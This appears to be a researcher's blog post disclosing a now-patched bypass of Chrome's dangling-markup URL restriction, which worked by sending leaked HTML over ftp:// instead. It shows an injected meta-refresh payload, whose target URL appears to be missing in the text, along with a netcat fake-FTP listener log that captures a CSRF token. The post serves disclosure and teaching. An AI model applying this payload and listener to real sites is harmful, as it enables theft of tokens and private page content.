Bypassing Chrome's URL restrictions


Studying about Content Security Policy (CSP) features, I came across a nice bypass of Chrome’s URL restrictions that the browser implements to prevent leak of HTML data. However, Chrome dropped the feature on which with the bypass rely on in its 89 version released stable a few days ago so it is no longer possible to trigger.

The idea of Chrome developpers was to prevent exfiltration of HTML content done after triggering injections vulnerabilities through restrictions on what characters can be present in an URL. Specifically if lower than ‘<’ and newline ‘\n’ are both present in an URL, the request towards it are blocked because it is considered as a malicious exfiltration.

It is typical of XSS and other type of injections such as HTML dangling markup to exfiltrate content that way so if there is no or very few legit cases in which both characters are present in an URL, it is worth implementing such defense.

Full Chrome-side discussion on the need of implementing such defense can be found here and here.


Imagine a vulnerable website where injections in HTML code is possible and where an attacker decided to use HTML dangling markup to exfiltrate everything after a dangling tag until a quote is encountered.

The vulnerable page would be something like:

<!DOCTYPE html>
    <h1>Welcome, some_vulnerable_field !</h1>

    <input type="text" name="csrf-token" value="s3cr3t"/>

    <p>Some text in a paragraph</p>

    <p>More text in a paragraph, to make the exfiltrated data longer, and here is the stopping char :'( </p>

Where some_vulnerable_field is the result of a non-filtered HTML form field.

The dangling tag could be of the form:

<meta http-equiv="refresh" content='0; URL=

And would result in the following code:

<!DOCTYPE html>
    <h1>Welcome, <meta http-equiv="refresh" content='0; URL= !</h1>

    <input type="text" name="csrf-token" value="s3cr3t"/>

    <p>Some text in a paragraph</p>

    <p>More text in a paragraph, to make the exfiltrated data longer, and here is the stopping char :'( </p>

Without the Chrome in-place restriction, when HTML would be loaded by the browser, a GET request would be issued to an attacker website as such:

GET /%20!%3C/h1%3E%0A%0A%20%20%20%20%3Cinput%20type=%22text%22%20name=%22csrf-token%22%20value=%22s3cr3t%22/%3E%0A%0A%20%20%20%20%3Cp%3ESome%20text%20in%20a%20paragraph%3C/p%3E%0A%0A%20%20%20%20%3Cp%3EMore%20text%20in%20a%20paragraph,%20to%20make%20the%20exfiltrated%20data%20longer,%20and%20here%20is%20the%20stopping%20char%20: HTTP/1.1

But because the defense exists, it gets blocked with the following warning:

Chrome warning

It thus prevent an attacker to exfiltrate data using that technique.


Trying to circumvent that restriction, a suggestion on caught my attention.

The bypass rely on the fact that the restriction seems to be only applied to “http://” and “https://” schemes, what if you send the information on another protocol?

Chrome before 89 only natively supports few schemes. I found the following list from their github:

  • http/https
  • ftp
  • gopher
  • ws/wss (websockets)

Let’s try with FTP.

By hosting a fake FTP server with netcat and trying on a vulnerable page as such:

<!DOCTYPE html>
    <h1>Welcome, <meta http-equiv="refresh" content='0; URL= !</h1>

    <input type="text" name="csrf-token" value="s3cr3t"/>

    <p>Some text in a paragraph</p>

    <p>More text in a paragraph, to make the exfiltrated data longer, and here is the stopping char :'( </p>

I obtained the following FTP conversation:

$ nc -lvCp 21
listening on [any] 21 ...
connect to [X.X.X.X] from some.domain [Y.Y.Y.Y]
220 ok
USER anonymous
331 pass
230 ok
215 UNIX Type: L8
257 "/"
200 Switching to Binary mode
SIZE / !</h1>    <input type="text" name="csrf-token" value="s3cr3t"/>    <p>Some text in a paragraph</p>    <p>More text in a paragraph, to make the exfiltrated data longer, and here is the stopping char :

So Chrome restriction did not apply here and data was exfiltrated.

It probably works with Gopher also but not tested.

As far as I know, websockets can only be initiated from javascript code so the bypass only works with an XSS. Point is, if you have an XSS, there is easier ways of bypassing that restriction, such as base64-encode the data before sending it, and so it becomes way less useful.


I reported the bug to Chromium’s security. They decided to drop FTP and Gopher support in version 89 and so the bypass is not working anymore because underlying feature has been killed.
